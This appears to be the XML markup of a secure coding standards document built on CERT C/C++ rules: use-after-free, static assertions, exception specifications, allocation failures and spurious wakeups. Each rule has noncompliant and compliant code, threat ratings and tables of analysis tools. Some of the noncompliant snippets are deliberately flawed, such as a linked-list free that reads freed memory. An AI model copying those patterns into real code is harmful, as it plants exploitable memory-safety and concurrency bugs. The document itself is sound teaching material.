              <w:ind w:right="0" w:left="0" w:firstLine="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
                <w:spacing w:val="0"/>
                <w:position w:val="0"/>
                <w:sz w:val="22"/>
                <w:shd w:fill="auto" w:val="clear"/>
              </w:rPr>
            </w:pP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p>
        </w:tc>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P18</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="18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L1</w:t>
            </w:r>
          </w:p>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w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr/>
      <w:tblGrid>
        <w:gridCol w:w="1807"/>
        <w:gridCol w:w="1341"/>
        <w:gridCol w:w="4021"/>
        <w:gridCol w:w="3611"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="460"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Tool</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Version</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Checker</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="361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Description Tool</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LDRA tool suite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9.7.1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108 D, 109 D</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Partially implemented</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Parasoft C/C++test</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2023.1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CERT_C-STR02-a</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CERT_C-STR02-b</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CERT_C-STR02-c</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 against command injection</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 against file name injection</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 against SQL injection</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Polyspace Bug Finder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R2024a</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="240"/>
              <w:ind w:right="0" w:left="0" w:firstLine="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
                <w:spacing w:val="0"/>
                <w:position w:val="0"/>
                <w:sz w:val="22"/>
                <w:shd w:fill="auto" w:val="clear"/>
              </w:rPr>
            </w:pP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 C: Rec. STR02-C</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Checks for:</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Execution of externally controlled command</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 executed from externally controlled path</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Library loaded from externally controlled path</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 partially covered.</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Coverity</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TAINTED_STRING</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Fully implemented</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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0" w:line="240"/>
        <w:ind w:right="0" w:left="0" w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:spacing w:val="0"/>
          <w:position w:val="0"/>
          <w:sz w:val="27"/>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Standard 5</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807"/>
        <w:gridCol w:w="1341"/>
        <w:gridCol w:w="7632"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="42"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Coding Standard</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="134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Label</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7632"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Do not access freed memory</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="321" w:hRule="auto"/>
          <w:jc w:val="left"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1807" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="000000" w:sz="8"/>
              <w:left w:val="single" w:color="000000" w:sz="8"/>
              <w:bottom w:val="single" w:color="000000" w:sz="8"/>
              <w:right w:val="single" w:color="000000" w:sz="8"/>
            </w:tcBorders>
            <w:shd w:color="auto" w:fill="f3f3f3"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Protection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1341"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MEM30-C</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7632"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Evaluating a pointer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including dereferencing the pointer, using it as an operand of an arithmetic operation, type casting it, and using it as the right-hand side of an assignment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into memory that has been deallocated by a memory management function is undefined behavior. Pointers to memory that has been deallocated are called dangling pointers. Accessing a dangling pointer can result in exploitable vulnerabilities.</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26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Noncompliant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example shows both the incorrect and correct techniques for freeing the memory associated with a linked list. In their (intentionally) incorrect example, p is freed before p-&gt;next is executed, so that p-&gt;next reads memory that has already been freed.</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&lt;stdlib.h&gt;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 node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value;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struct node *next;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free_list(struct node *head)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(struct node *p = head; p != NULL; p = p-&gt;next)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8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correct this error by storing a reference to p-&gt;next  in q before freeing p:</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&lt;stdlib.h&gt;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 node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value;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struct node *next;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free_list(struct node *head)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struct node *q;</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(struct node *p = head; p != NULL; p = q)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 = p-&gt;next;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780"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="1" w:hRule="atLeast"/>
          <w:jc w:val="left"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10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Principles(s):</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
                <w:spacing w:val="0"/>
                <w:position w:val="0"/>
                <w:sz w:val="22"/>
                <w:shd w:fill="auto" w:val="clear"/>
              </w:rPr>
              <w:t xml:space="preserve"> Validate Input Data: Properly handling memory deallocation requires ensuring that pointers used for operations are valid and not pointing to deallocated memory. By saving p-&gt;next in a temporary variable (q) before freeing p, the compliant code ensures that pointer operations only access valid memory, preventing undefined behavior and exploitable vulnerabilities.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 Defense in Depth: Memory safety is a critical layer in overall system security. By adopting practices that protect against dangling pointers (like saving p-&gt;next before freeing memory), this coding standard adds a layer of protection, making the system more resilient to memory management issues and reducing the potential for security vulnerabilities caused by improper memory access.</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Threat Level</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr/>
      <w:tblGrid>
        <w:gridCol w:w="1806"/>
        <w:gridCol w:w="1341"/>
        <w:gridCol w:w="4021"/>
        <w:gridCol w:w="1807"/>
        <w:gridCol w:w="1805"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="460" w:hRule="auto"/>
          <w:jc w:val="left"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1806"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Severity</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Likelihood</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Remediation Cost</w:t>
            </w:r>
          </w:p>
        </w:tc>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1805"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Level</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="460" w:hRule="auto"/>
          <w:jc w:val="left"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="180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Likely</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p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="240"/>
              <w:ind w:right="0" w:left="0" w:firstLine="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
                <w:spacing w:val="0"/>
                <w:position w:val="0"/>
                <w:sz w:val="22"/>
                <w:shd w:fill="auto" w:val="clear"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>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P18</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="18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L1</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w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr/>
      <w:tblGrid>
        <w:gridCol w:w="1807"/>
        <w:gridCol w:w="1341"/>
        <w:gridCol w:w="4021"/>
        <w:gridCol w:w="3611"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="460"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Tool</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Version</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Checker</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="361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Description Tool</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Astrée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24.04</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dangling_pointer_use</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Supported</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Astrée reports all accesses to freed allocated memory.</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Axivion Bauhaus Suite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CertC-MEM30</w:t>
              <w:tab/>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Detects memory accesses after its deallocation and double memory deallocations</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CodeSonar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8.1p0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ALLOC.UAF</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after free</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Coverity</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2017.07</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USE_AFTER_FREE</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detect the specific instances where memory is deallocated more than once or read/written to the target of a freed pointer</w:t>
            </w:r>
          </w:p>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0" w:line="240"/>
        <w:ind w:right="0" w:left="0" w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:spacing w:val="0"/>
          <w:position w:val="0"/>
          <w:sz w:val="27"/>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Standard 6</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807"/>
        <w:gridCol w:w="1341"/>
        <w:gridCol w:w="7632"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="42"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Coding Standard</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="134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Label</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7632"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Use a static assertion to test the value of a constant expression</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="321" w:hRule="auto"/>
          <w:jc w:val="left"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1807" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="000000" w:sz="8"/>
              <w:left w:val="single" w:color="000000" w:sz="8"/>
              <w:bottom w:val="single" w:color="000000" w:sz="8"/>
              <w:right w:val="single" w:color="000000" w:sz="8"/>
            </w:tcBorders>
            <w:shd w:color="auto" w:fill="f3f3f3"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Assertions</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1341"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DCL03-C</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7632"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Assertions are a valuable diagnostic tool for finding and eliminating software defects that may result in vulnerabilities (see MSC11-C. Incorporate diagnostic tests using assertions). The runtime assert() macro has some limitations, however, in that it incurs a runtime overhead and because it calls abort(). Consequently, the runtime assert() macro is useful only for identifying incorrect assumptions and not for runtime error checking. As a result, runtime assertions are generally unsuitable for server programs or embedded systems.</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26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Noncompliant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Although the use of the runtime assertion is better than nothing, it needs to be placed in a function and executed. This means that it is usually far away from the definition of the actual structure to which it refers. The diagnostic occurs only at runtime and only if the code path containing the assertion is executed.</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&lt;assert.h&gt;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 timer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unsigned char MODE;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unsigned int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unsigned int COUNT;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func(void)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assert(sizeof(struct timer) == sizeof(unsigned char) + sizeof(unsigned int) + sizeof(unsigned int));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8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assertions involving only constant expressions, a preprocessor conditional statement may be used, as in this compliant solution:</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 timer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unsigned char MODE;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unsigned int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unsigned int COUNT;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(sizeof(struct timer) != (sizeof(unsigned char) + sizeof(unsigned int) + sizeof(unsigned int)))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#error "Structure must not have any padding"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#endif</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780"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="1" w:hRule="atLeast"/>
          <w:jc w:val="left"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10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Principles(s):</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
                <w:spacing w:val="0"/>
                <w:position w:val="0"/>
                <w:sz w:val="22"/>
                <w:shd w:fill="auto" w:val="clear"/>
              </w:rPr>
              <w:t xml:space="preserve"> Use Effective Quality Assurance Techniques: This standard aligns with robust quality assurance by emphasizing compile-time validation using preprocessor directives instead of runtime assertions. Detecting issues like structure padding at compile-time avoids runtime surprises and ensures that problems are identified early in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It Simple: Compile-time assertions provide a straightforward and efficient way to validate conditions involving constant expressions. By using preprocessor directives, the solution avoids unnecessary runtime overhead and complexity, making the code simpler and more reliable.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Threat Level</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr/>
      <w:tblGrid>
        <w:gridCol w:w="1806"/>
        <w:gridCol w:w="1341"/>
        <w:gridCol w:w="4021"/>
        <w:gridCol w:w="1807"/>
        <w:gridCol w:w="1805"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="460" w:hRule="auto"/>
          <w:jc w:val="left"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1806"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Severity</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Likelihood</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Remediation Cost</w:t>
            </w:r>
          </w:p>
        </w:tc>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1805"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Level</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="460" w:hRule="auto"/>
          <w:jc w:val="left"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="180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Unlikely</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r>
          </w:p>
        </w:tc>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P1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="18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L3</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w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr/>
      <w:tblGrid>
        <w:gridCol w:w="1807"/>
        <w:gridCol w:w="1341"/>
        <w:gridCol w:w="4021"/>
        <w:gridCol w:w="3611"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="460"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Tool</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Version</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Checker</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="361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Description Tool</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Clang</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misc-static-assert</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Checked by clang-tidy</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CodeSonar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8.1p0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customization</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can implement a custom check that reports uses of the assert() macro</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ECLAIR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CC2.DCL03</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Fully implemented</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LDRA tool suite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9.7.1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S</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Fully implemented</w:t>
            </w:r>
          </w:p>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0" w:line="240"/>
        <w:ind w:right="0" w:left="0" w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:spacing w:val="0"/>
          <w:position w:val="0"/>
          <w:sz w:val="27"/>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Standard 7</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807"/>
        <w:gridCol w:w="1341"/>
        <w:gridCol w:w="7632"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="42"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Coding Standard</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="134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Label</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7632"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Honor exception specifications</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="321" w:hRule="auto"/>
          <w:jc w:val="left"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1807" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="000000" w:sz="8"/>
              <w:left w:val="single" w:color="000000" w:sz="8"/>
              <w:bottom w:val="single" w:color="000000" w:sz="8"/>
              <w:right w:val="single" w:color="000000" w:sz="8"/>
            </w:tcBorders>
            <w:shd w:color="auto" w:fill="f3f3f3"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Exceptions</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1341"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ERR55-CPP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7632"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function declared with a dynamic-exception-specification throws an exception of a type that would not match the exception-specification, the function std::unexpected() is called. The behavior of this function can be overridden but, by default, causes an exception of std::bad_exception to be thrown. Unless std::bad_exception is listed in the exception-specification, the function std::terminate() will be called.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Similarly, if a function declared with a noexcept-specification throws an exception of a type that would cause the noexcept-specification to evaluate to false, the function std::terminate() will be called.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Calling std::terminate() leads to implementation-defined termination of the program. To prevent abnormal termination of the program, any function that declares an exception-specification should restrict itself, as well as any functions it calls, to throwing only allowed exceptions.</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26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Noncompliant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noncompliant code example, a function is declared as nonthrowing, but it is possible for std::vector::resize() to throw an exception when the requested memory cannot be allocated.</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&lt;cstddef&gt;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&lt;vector&gt;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f(std::vector&lt;int&gt; &amp;v, size_t s) noexcept(true)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v.resize(s); // May throw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8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compliant solution, the function's noexcept-specification is removed, signifying that the function allows all exceptions.</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&lt;cstddef&gt;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&lt;vector&gt;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f(std::vector&lt;int&gt; &amp;v, size_t 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v.resize(s); // May throw, but that is okay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780"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="1" w:hRule="atLeast"/>
          <w:jc w:val="left"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10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Principles(s):</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
                <w:spacing w:val="0"/>
                <w:position w:val="0"/>
                <w:sz w:val="22"/>
                <w:shd w:fill="auto" w:val="clear"/>
              </w:rPr>
              <w:t xml:space="preserve"> Architect and Design for Security Policies: This principle aligns with the correct use of exception specifications. Declaring noexcept(true) when a function might throw violates proper design, as it misrepresents the behavior of the function. By removing the noexcept declaration, the compliant code aligns with the policy of accurately defining the behavior of functions, ensuring that exception handling mechanisms work as intended and prevent undefined behavior.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Adhere to the Principle of Least Privilege: Exception specifications act as contracts, dictating which exceptions are permissible. Over-promising by declaring noexcept without meeting its constraints can escalate the impact of failures, such as program termination via std::terminate. The compliant code follows the principle by avoiding overly restrictive promises, thus minimizing potential disruptions.</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Threat Level</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr/>
      <w:tblGrid>
        <w:gridCol w:w="1806"/>
        <w:gridCol w:w="1341"/>
        <w:gridCol w:w="4021"/>
        <w:gridCol w:w="1807"/>
        <w:gridCol w:w="1805"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="460" w:hRule="auto"/>
          <w:jc w:val="left"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1806"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Severity</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Likelihood</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Remediation Cost</w:t>
            </w:r>
          </w:p>
        </w:tc>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1805"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Level</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="460" w:hRule="auto"/>
          <w:jc w:val="left"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="180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Likely</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w:t>
            </w:r>
          </w:p>
        </w:tc>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P9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="18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L2</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w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr/>
      <w:tblGrid>
        <w:gridCol w:w="1807"/>
        <w:gridCol w:w="1341"/>
        <w:gridCol w:w="4021"/>
        <w:gridCol w:w="3611"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="460"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Tool</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Version</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Checker</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="361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Description Tool</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Astrée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22.10</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="240"/>
              <w:ind w:right="0" w:left="0" w:firstLine="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
                <w:spacing w:val="0"/>
                <w:position w:val="0"/>
                <w:sz w:val="22"/>
                <w:shd w:fill="auto" w:val="clear"/>
              </w:rPr>
            </w:pP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unhandled-throw-noexcept</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Partially checked</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Parasoft C/C++Test</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2023.1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CERT_CPP-ERR55-a</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a function's declaration includes an exception-specification, the function shall only be capable of throwing exceptions of the indicated type(s)</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Polyspace Bug Finder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R2024a</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 C++: ERR55-CPP</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Checks for noexcept functions exiting with exception (rule fully covered)</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RuleChecker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22.10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unhandled-throw-noexcept</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Partially checked</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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0" w:line="240"/>
        <w:ind w:right="0" w:left="0" w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:spacing w:val="0"/>
          <w:position w:val="0"/>
          <w:sz w:val="27"/>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Standard 8</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807"/>
        <w:gridCol w:w="1341"/>
        <w:gridCol w:w="7632"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="42"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Coding Standard</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="134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Label</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7632"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Detect and handle memory allocation errors</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="321" w:hRule="auto"/>
          <w:jc w:val="left"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1807" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="000000" w:sz="8"/>
              <w:left w:val="single" w:color="000000" w:sz="8"/>
              <w:bottom w:val="single" w:color="000000" w:sz="8"/>
              <w:right w:val="single" w:color="000000" w:sz="8"/>
            </w:tcBorders>
            <w:shd w:color="auto" w:fill="f3f3f3"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Choice]</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1341"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MEM52-CPP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7632"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default memory allocation operator, ::operator new(std::size_t), throws a std::bad_alloc exception if the allocation fails. Therefore, you need not check whether calling ::operator new(std::size_t) results in nullptr. The nonthrowing form, ::operator new(std::size_t, const std::nothrow_t &amp;), does not throw an exception if the allocation fails but instead returns nullptr. The same behaviors apply for the operator new[] versions of both allocation functions. Additionally, the default allocator object (std::allocator) uses ::operator new(std::size_t) to perform allocations and should be treated similarly.</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26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Noncompliant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noncompliant code example, an array of int is created using ::operator new[](std::size_t) and the results of the allocation are not checked. The function is marked as noexcept, so the caller assumes this function does not throw any exceptions. Because ::operator new[](std::size_t) can throw an exception if the allocation fails, it could lead to abnormal termination of the program.</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&lt;cstring&gt;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f(const int *array, std::size_t size) noexcept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*copy = new int[size];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std::memcpy(copy, array, size * sizeof(*copy));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delete [] copy;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8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using std::nothrow, the new operator returns either a null pointer or a pointer to the allocated space. Always test the returned pointer to ensure it is not nullptr before referencing the pointer. This compliant solution handles the error condition appropriately when the returned pointer is nullptr.</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&lt;cstring&gt;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&lt;new&gt;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f(const int *array, std::size_t size) noexcept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*copy = new (std::nothrow) int[size];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(!copy)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Handle error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std::memcpy(copy, array, size * sizeof(*copy));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delete [] copy;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780"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="1" w:hRule="atLeast"/>
          <w:jc w:val="left"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10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Principles(s):</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
                <w:spacing w:val="0"/>
                <w:position w:val="0"/>
                <w:sz w:val="22"/>
                <w:shd w:fill="auto" w:val="clear"/>
              </w:rPr>
              <w:t xml:space="preserve"> Validate Input Data: In the noncompliant code, failing to validate the pointer returned by the memory allocation can result in dereferencing a null pointer if the allocation fails. The compliant code ensures that the pointer is checked (if (!copy)) before it is used, preventing undefined behavior and safeguarding the program against memory allocation failures.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Architect and Design for Security Policies: Declaring the function as noexcept in the noncompliant code misrepresents its behavior because ::operator new[](std::size_t) can throw an exception. The compliant code accurately reflects potential failure cases by using std::nothrow and handles errors gracefully, aligning with secure design principles that anticipate and manage edge cases or failure scenarios.</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Threat Level</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr/>
      <w:tblGrid>
        <w:gridCol w:w="1806"/>
        <w:gridCol w:w="1341"/>
        <w:gridCol w:w="4021"/>
        <w:gridCol w:w="1807"/>
        <w:gridCol w:w="1805"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="460" w:hRule="auto"/>
          <w:jc w:val="left"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1806"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Severity</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Likelihood</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Remediation Cost</w:t>
            </w:r>
          </w:p>
        </w:tc>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1805"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Level</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="460" w:hRule="auto"/>
          <w:jc w:val="left"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="180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Likely</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p>
        </w:tc>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P18</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="18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L1</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w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr/>
      <w:tblGrid>
        <w:gridCol w:w="1807"/>
        <w:gridCol w:w="1341"/>
        <w:gridCol w:w="4021"/>
        <w:gridCol w:w="3611"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="460"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Tool</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Version</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Checker</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="361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Description Tool</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Coverity</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CHECKED_RETURN</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Finds inconsistencies in how function call return values are handled</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Parasoft C/C++test</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2023.1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CERT_CPP-MEM52-a</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CERT_CPP-MEM52-b</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the return value of new</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allocate resources in function argument list because the order of evaluation of a function's parameters is undefined</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="348"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Parasoft Insure++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Runtime detection</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Polyspace Bug Finder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R2024a</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 C++: MEM52-CPP</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Checks for unprotected dynamic memory allocation (rule partially covered)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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Standard 9 </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807"/>
        <w:gridCol w:w="1341"/>
        <w:gridCol w:w="7632"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="42"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Coding Standard</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="134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Label</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7632"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Wrap functions that can spuriously wake up in a loop</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="321" w:hRule="auto"/>
          <w:jc w:val="left"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1807" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="000000" w:sz="8"/>
              <w:left w:val="single" w:color="000000" w:sz="8"/>
              <w:bottom w:val="single" w:color="000000" w:sz="8"/>
              <w:right w:val="single" w:color="000000" w:sz="8"/>
            </w:tcBorders>
            <w:shd w:color="auto" w:fill="f3f3f3"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Choice]</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1341"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CON54-CPP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7632"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wait(), wait_for(), and wait_until() member functions of the std::condition_variable class temporarily cede possession of a mutex so that other threads that may be requesting the mutex can proceed. These functions must always be called from code that is protected by locking a mutex. The waiting thread resumes execution only after it has been notified, generally as the result of the invocation of the notify_one() or notify_all() member functions invoked by another thread.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wait() function must be invoked from a loop that checks whether a condition predicate holds. A condition predicate is an expression constructed from the variables of a function that must be true for a thread to be allowed to continue execution. The thread pauses execution via wait(), wait_for(), wait_until(), or some other mechanism, and is resumed later, presumably when the condition predicate is true and the thread is notified.</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26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Noncompliant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noncompliant code example monitors a linked list and assigns one thread to consume list elements when the list is nonempty.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thread pauses execution using wait() and resumes when notified, presumably when the list has elements to be consumed. It is possible for the thread to be notified even if the list is still empty, perhaps because the notifying thread used notify_all(), which notifies all threads. Notification using notify_all() is frequently preferred over using notify_one(). (See CON55-CPP. Preserve thread safety and liveness when using condition variables for more information.)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condition predicate is typically the negation of the condition expression in the loop. In this noncompliant code example, the condition predicate for removing an element from a linked list is (list-&gt;next != nullptr), whereas the condition expression for the while loop condition is (list-&gt;next == nullptr).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noncompliant code example nests the call to wait() inside an if block and consequently fails to check the condition predicate after the notification is received. If the notification was spurious or malicious, the thread would wake up prematurely.</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&lt;condition_variable&gt;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&lt;mutex&gt;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 Node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struct Node *next;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Node list;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std::mutex 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std::condition_variable condition;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consume_list_element(std::condition_variable &amp;condition)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std::unique_lock&lt;std::mutex&gt; lk(m);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(list.next == nullptr)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condition.wait(lk);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Proceed when condition holds.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8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compliant solution calls the wait() member function from within a while loop to check the condition both before and after the call to wait().</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&lt;condition_variable&gt;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&lt;mutex&gt;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 Node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struct Node *next;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Node list;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std::mutex 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std::condition_variable condition;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consume_list_element()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std::unique_lock&lt;std::mutex&gt; lk(m);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(list.next == nullptr)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condition.wait(lk);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Proceed when condition holds.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780"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="1" w:hRule="atLeast"/>
          <w:jc w:val="left"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10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Principles(s):</w:t>
